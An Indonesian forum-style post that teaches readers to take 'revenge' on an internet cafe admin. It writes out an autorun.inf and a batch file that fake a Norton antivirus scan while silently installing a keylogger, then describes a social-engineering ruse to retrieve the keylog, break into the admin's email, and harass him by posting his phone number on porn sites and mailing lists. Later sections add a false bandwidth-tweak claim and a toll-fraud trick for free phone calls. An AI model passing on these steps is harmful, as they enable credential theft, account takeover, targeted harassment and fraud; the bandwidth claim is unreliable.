menghajar adminya sebuah warnet

setelah banyak tread yang katanya abis di kerjain ama admin maka saatnya kita balas dendam hehehehe
this time to war with admin writen by patrix
mari kita ngerjain admin hahahaha monggo dicoba
Semakin paranoidnya para admin belakangan ini menyebabkan banyak pengguan jasa layanan internet cafe (warnet) menjadi kurang nyaman.

|—[Table of Content

1. Introduction
2. Serangan pertama
3. Serangan kedua
4. Hari pembalasan
5. Cara pencegahan
6. Penutup
[+] Kesimpulan
[+] Referensi


1. Introduction

Semakin paranoidnya para admin belakangan ini menyebabkan banyak pengguan jasa layanan internet cafe (warnet) menjadi kurang nyaman. Restriction (pembatasan) disana-sini (walaupun semua itu dilakukan bukan tanpa alasan) menjadi salah satu inspirasi bagi banyak orang untuk mencari-cari cara menerobos segala keterbatasan itu dan saling men-share pengetahuan mereka. Berbagai jenis exploit pun dibedah, didiskusikan dan dikemas menjadi artikel untuk para newbie.
Sejenak para newbie bisa tertawa puas, berjaya, senyum-senyum sendiri sampai tak jarang lupa diri Namun semua itu tentunya tidak bertahan lama. Admin menjadi semakn pintar. Fasilitas Floppy drive dan CD room drive dihapus dan melarang user untuk melakukan segala bentuk transfer file dari media penyimpanan sementara (disket, cd, flashdisk) kecuali melalui server terlebih dahulu. Ini merupakan fenomena yang akhir-akhir ini bisa kita temui dengan mudah di berbagai Internet cafe. Admin mulai rajin mengupdate path sehingga exploit-exploit yang dulu dibangga-banggakan oleh kaum newbie menjadi “rongsokan” tak berguna.
Sekarang, mari kita bangunkan sang admin dari mimpi indahnya untuk menunjukkan bahwa menjadi paranoid itu adakalanya tidak baik dan tidak ada system yang 100% secure.

2. Serangan pertama

Kita akan menjadi seorang “agen mata-mata” (hehehe.. gw pake istilah ini biar ente merasa agak sedikit keren) yang akan merekam segala aktivitas sang admin. Tujuannya.. banyak! dan salah satunya seperti hal yang banyak diinginkan orang.. mendapatkan password sang admin. Partner kita kali ini adalah navw32.exe, sebuah keyloger dengan icon Norton AntiVirus yang bisa kamu dapatkan suka-suka dengan harga cuma-cuma di
masuk di www.spyrozone.net daftar dulu jadi member trus masuk di bagian keyloger download broo
. Setelah kamu download keyloger tersebut, ikuti langkah-langkah berikut:

—[1 Bukalah Notepad kemudian ketik satu baris script berikut:

open=nav.bat

Klik [file][save] kemudian pada box save as type, pilih All Files dan pada form isian name beri nama Autorun.inf lalu klik tombol [save].

—[2 Buka lembar baru pada notepad dengan klik menu [file][new] lalu ketik script berikut:
Code:

@echo off
echo Norton Antivirus 2006
echo Scanning disk drive…
echo Please wait…
copy navw32.exe %windir%\navw32.exe
call %windir%\navw32.exe
echo.
echo.
echo.
echo.
echo.
echo.
echo.
echo. Scanning complette! No virus threat detected!
echo.
cls

Klik [file][save] kemudian pada box save as type, pilih All Files dan pada form isian name beri nama nav.bat lalu klik tombol [save].

—[3. Persiapkan beberapa file microsoft word documents (bisa diganti dengan file lain) sebagai tipuan/alasan untuk di transfer. Semakin banyak file, semakin baik karena file keyloger kamu akan semakin tersamarkan.

—[4. Persiapkan sebuah cd kosong (bekas juga boleh) lalu bakar semua file diatas (autorun.inf, nav.bat, navw32.exe dan file-file tipuan) kedalam CD.

Sekarang pergilah ke warnet tempat sang admin berkuasa. Bersikaplah seperti biasa dan jangan gugup selayaknya para koruptor yang sering nampang di satasion-stasion TV tanpa rasa malu. Setelah kamu login ke billing komputer user, datangi sang admin. Katakan pada beliau, “Mas/mbak/om/tante/, mau transfer file dari cd ini. Nama filenya blablabla tolong dikirim ke komputer nomor blablabla.”
Begitu CD dimasukkan, saat itulah terjadi sebuah fenomena berikut:
Komputer akan memproses file autorun.inf secara otomatis —> file autorun.inf akan memproses file nav.bat —> file nav.bat akan menduplikasi file navw32.exe ke dalam directory windows dan mengaktivkannya —> Keyloger telah terinstall, hasil rekamannya akan tersimpan di directory yang sama dengan nama navw32.dll beratribut hidden.
Sekarang, kamu bisa pulang dengan wajah tanpa dosa dan mungkin (lagi-lagi) kamu bakalan senyum-senyum sendiri sambil mengelus-elus jenggot kayak habis menang togel.
Lalu bagaimana cara mengambil file hasil rekaman keyloger di directory windows sang admin? Ikuti langkah-langkah pada serangan kedua.

3. Serangan kedua

Dua hari Kemudian, datanglah ke warnet itu lagi. Bertingkah lakulah secara wajar dan beraktivitas seperti layaknya user biasa. Setelah selesai berinternet ria, datangi sang admin, bayarlah biaya browsing seperti biasa lalu dengan wajah sangat-sangat memelas seperti pengemis di jalanan katakan pada beliau,”Mas/mbak/om/tante/, komputer saya bermasalah neeh. Mnurut pesan Error yang muncul, file navw32.dll yang berada di directory windows hilang. File tersebut beratribut hidden. Tolong doong copykan dari komputer ini. Kebetulan versi windowsnya sama dengan komputer saya..”
Tentu saja biasanya sang admin dengan sangat senang hati akan membantu kamu. Dengan suka rela dan penuh kesadaran beliau akan mengaktifkan opsi Show All files pada Folder Options dan mengcopy-kan file navw32.dll dari directory windows tanpa menyadari bahwa file tersebut bukan file system, namun file hasil rekaman keyloger.
Berikan disket/cd/flashdisk mu dan setelah file tersebut tersimpan, ucapkan beribu terima kasih lalu pulanglah ke rumah. Buka file tersebut di rumah. Klik 2x pada file lalu ketika muncul kotak dialog open with, klik opsi select program from a list dan pilih notepad pada daftar program yang ditampilkan.
Sekarang tentunya kamu bisa leluasa membaca rekaman aktivitas sang admin. Cari password emailnya dan kamu bisa menuju pada hari pembalasan.

4. Hari Pembalasan

Pilih hari yang tepat, misalnya malam jum’at kliwon dimana sang admin mungkin sedang terlelap di rumahnya. Nyalakan komputermu dan connectlah ke Internet. Namun ada baiknya kamu lakukan hal ini di warnet agar lebih aman. Carilah warnet yang buka 24 jam.
Berbekal hasil rekaman keyloger tadi, loginlah ke account email sang admin. Setelah puas menjelajahi emailnya, subscriblah ke berbagai mailing list besar dengan email tersebut. Subscribe sebanyak-banyaknya.
Ada ide yang sedikit lebih sadis (ini cuma ide lho.. sebaiknya jangan dilakukan deech..). Daftarkan emailnya ke berbagai situs-situs porno dan postinglah sebuah pesan singkat, memikat dan “mematikan”. Berikut contohnya jika milis tersebut berbahasa Indonesia:

Dear all..
gwe lagi nafsu berat neeh, burun telepon gwe doong sekarang juga!! neeh no telp gwe: 021-blablabla (masukkan no telp sang admin)
gwe tunggu 24 jam lho!!

Atau jika berbahasa Inggris:

Dear,
Wanna play “freestyle” with mw? Please call me : 062-021-blablabla
You may F**k me for free!! hahahaha

Atau terserah kamu laah.. saya rasa kamu lebih pintar dalam memilih kata-kata yang yahuud!!
Maka bisa dipastikan malam itu akan menjadi malam jumat kliwon paling mengerikan bagi sang admin, lebih mengerikan daripada film-film horor manapun! Telepon rumahnya akan berdering tanpa henti dibanjiri oleh telepon dari dalam dan luar negeri dengan maksud pembicaraan yang sudah bisa ditebak apa maksudnya
Keesokan harinya, setelah menghadapi malam paling mengerikan itu, sang admin akan kaget 1/2 hidup 1/2 mati mendapati inboxnya penuh dengan email-email dari berbagai milis yang beliau sendiri tidak merasa pernah bergabung dengan milis-milis itu. Dan bisa jadi, saat beliau sedang sibuk Unscribe dari milis-milis tersebut, telepon rumahnya masih terus-terusan menjerit-jerit dengan jeritan indah

5. Pencegahan

Jika kamu adalah admin yang tidak mau mengalami nasib seperti diatas, maka setiap kamu menerima CD dari siapapun selalu tekan-tahan tombol shift sambil memasukkan CD kedalam CD Room dRive. Setelah CD masuk, tetap tekan tombol shift sampai kira-kira 25 detik. Setelah itu kamu bisa melepas tombol shift dan mengaksesnya melalui windows Explorer. Klik pada area folder tree sebelah kiri, jangan pada daftar drive sebelah kanan karena fitur autorun akan aktif.

6. Penutup

—[+ Kesimpulan
Bisa kita bayangkan sendiri betapa kelalaian sepele bisa menimbulkan dampak yang sangat berbahaya. Ini hanya merupakan contoh Social Engineering sederhana namun berdampak luar biasa, untuk memancing ide kreatif anda.

—[+ Referensi
Self implementing

Note:
Sebelum anda menerapkan ide-ide diatas, saya mohon dengan sangat agar anda brfikir jernih dan mengunakan akal sehat anda. Kalau misalnya sang admin telah menolak cinta anda, jangan lantas seenaknya melakukan pembalasan dengan cara diatas. Ada baiknya anda pergi ke market terdekat
Tapi kalau sang admin adalah orang-orang sombong dan telah melakukan kecurangan, menganggap rendah anda dan mengklaim diri mereka adalah super-Hacker, maka anda bisa membungkam mulut besar mereka dengan cara ini.

FASTER Browsing

Click Start-->Run-->type gpedit.msc

Setelah group policy editor terbuka, langkah selanjutnya adalah :

Local Computer Policy-->Computer Configuration-->
Administrative Templates-->Network-->QOS Packet Scheduler-->
Limit Reservable Bandwidth

Double click Limit Reservable bandwidth. Maka akan tampak default-nya yaitu not configured, sebelum beraksi cobalah click 'Explain' tab di mana ada keterangan sbb :

"By default, the Packet Scheduler limits the system to 20 percent of the bandwidth of a connection, but you can use this setting to override the default."

Artinya apa ? Secara harfiah.....Micrxsoft menggunakan 20% bandwith untuk tujuan mereka......bener nggak ?

Jadi, mendingan ENABLE reservable bandwidth, isi dengan angka 0 (Nol). Sehingga system tidak mencadangkan bandwith buat si boss Micrxsoft untuk tujuan pribadinya.

Setelah sukses ....... restrart pc dan cobalah untuk browsing....pasti hasilnya akan ada increase (minimal 20%).

TRIK TELP GRATIS INTERLOKAL (LUAR KOTA)

Fasilitas dan cara yang digunakan

1. Telphone rumah, kantor atau wartel tipe B (sangat dianjurkan)
2. Telponlah seperti kita menelpon biasa ke NOMOR TUJUAN LUAR KOTA (khusus luar kota)
3. Bicaralah sepuas hati dan sebengkak bibir anda
4. Bila telah selesai percakapan ...

PERHATIKAN TRIK INI:
1. SEBELUM ANDA MENUTUP TELEPHON, KETIKLAH NOMOR TUJUAN PERSIS SEPERTI NOMOR YANG DITUJU PERTAMA
misal: tujuan 0778458367 --> bila telah selesai ketikan 0778458367 lagi
JANGAN PAKAI TOMBOL RADIAL, KARENA SERING GAGAL
2. SEPERTI CARA TRIK PERTAMA (1) TADI CUMAN KITA RUBAH NOMOR TUJUAN AKHIR
misal: tujuan 0778458367 --> bila telah selesai ketikan 031545552222 (BEDA NOMOR TUJUAN)
JANGAN PAKAI TOMBOL RADIAL, KARENA SERING GAGAL

CATATAN:
Hati-hati dalam melakukan aksi ini karena sangat merugikan pihak lain. Jangan sekali-kali gunakan wartel tipe A untuk melakukan trik ini keluar kotak karena akan kelihatan pada komputer billing operator dan pasti Anda akan dicurigai karena pulsa akan hilang begitu saja dari layar monitor operator Wartel. Jangan menggunakan trik ini karera akan merugikan pihak lain....... kecuali dalam keadaan darurat